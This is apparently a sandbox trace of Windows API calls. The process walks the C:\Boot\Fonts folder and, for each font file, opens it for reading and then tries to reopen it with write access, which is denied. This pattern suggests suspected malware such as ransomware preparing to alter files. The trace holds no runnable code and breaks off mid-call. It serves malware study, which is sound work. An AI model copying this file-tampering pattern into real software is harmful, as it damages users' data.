1 [0083.362] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0083.362] AreFileApisANSI () returned 1 [0083.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0083.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53718 [0083.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 31 [0083.362] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.363] GetFileType (hFile=0x340) returned 0x1 [0083.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.363] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.363] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.363] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.363] CloseHandle (hObject=0x340) returned 1 [0083.363] AreFileApisANSI () returned 1 [0083.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0083.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x533b8 [0083.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 31 [0083.364] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.364] GetLastError () returned 0x5 [0083.364] GetLastError () returned 0x5 [0083.364] SetLastError (dwErrCode=0x5) [0083.364] GetLastError () returned 0x5 [0083.364] SetLastError (dwErrCode=0x5) [0083.364] GetLastError () returned 0x5 [0083.364] SetLastError (dwErrCode=0x5) [0083.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.364] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c0da69, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef97d9ab, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x14f66, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="segoen_slboot.ttf", cAlternateFileName="SEGOEN~1.TTF")) returned 1 [0083.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0083.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0083.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0083.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0083.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0083.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0083.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0083.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0083.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0083.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0083.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0083.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0083.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.365] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.365] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.365] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.365] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0083.365] AreFileApisANSI () returned 1 [0083.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\segoen_slboot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\segoen_slboot.ttf", lpUsedDefaultChar=0x0) returned 32 [0083.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.365] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.365] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.365] AreFileApisANSI () returned 1 [0083.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0083.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0083.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=32 | out: lpWideCharStr="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 32 [0083.366] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.366] GetFileType (hFile=0x340) returned 0x1 [0083.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.366] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.366] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.366] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.366] CloseHandle (hObject=0x340) returned 1 [0083.366] AreFileApisANSI () returned 1 [0083.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0083.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=32 | out: lpWideCharStr="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 32 [0083.367] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.367] GetLastError () returned 0x5 [0083.367] GetLastError () returned 0x5 [0083.367] SetLastError (dwErrCode=0x5) [0083.367] GetLastError () returned 0x5 [0083.367] SetLastError (dwErrCode=0x5) [0083.367] GetLastError () returned 0x5 [0083.367] SetLastError (dwErrCode=0x5) [0083.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.367] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.367] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.367] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef98c419, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x150a2, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="segoe_slboot.ttf", cAlternateFileName="SEGOE_~1.TTF")) returned 1 [0083.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0083.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0083.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0083.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0083.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0083.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0083.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0083.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0083.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0083.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0083.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0083.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0083.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0083.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.368] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.368] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.368] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.368] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0083.368] AreFileApisANSI () returned 1 [0083.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\segoe_slboot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\segoe_slboot.ttf", lpUsedDefaultChar=0x0) returned 31 [0083.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.368] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.368] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.369] AreFileApisANSI () returned 1 [0083.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0083.369] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x533b8 [0083.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 31 [0083.369] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.369] GetFileType (hFile=0x340) returned 0x1 [0083.369] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.369] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.369] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.369] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.369] CloseHandle (hObject=0x340) returned 1 [0083.370] AreFileApisANSI () returned 1 [0083.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0083.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x534d8 [0083.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 31 [0083.370] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.370] GetLastError () returned 0x5 [0083.370] GetLastError () returned 0x5 [0083.370] SetLastError (dwErrCode=0x5) [0083.370] GetLastError () returned 0x5 [0083.370] SetLastError (dwErrCode=0x5) [0083.370] GetLastError () returned 0x5 [0083.370] SetLastError (dwErrCode=0x5) [0083.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.370] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.370] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.370] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0083.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.371] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.371] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.371] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.371] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.371] AreFileApisANSI () returned 1 [0083.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\wgl4_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\wgl4_boot.ttf", lpUsedDefaultChar=0x0) returned 28 [0083.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.371] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.371] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0083.371] AreFileApisANSI () returned 1 [0083.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, 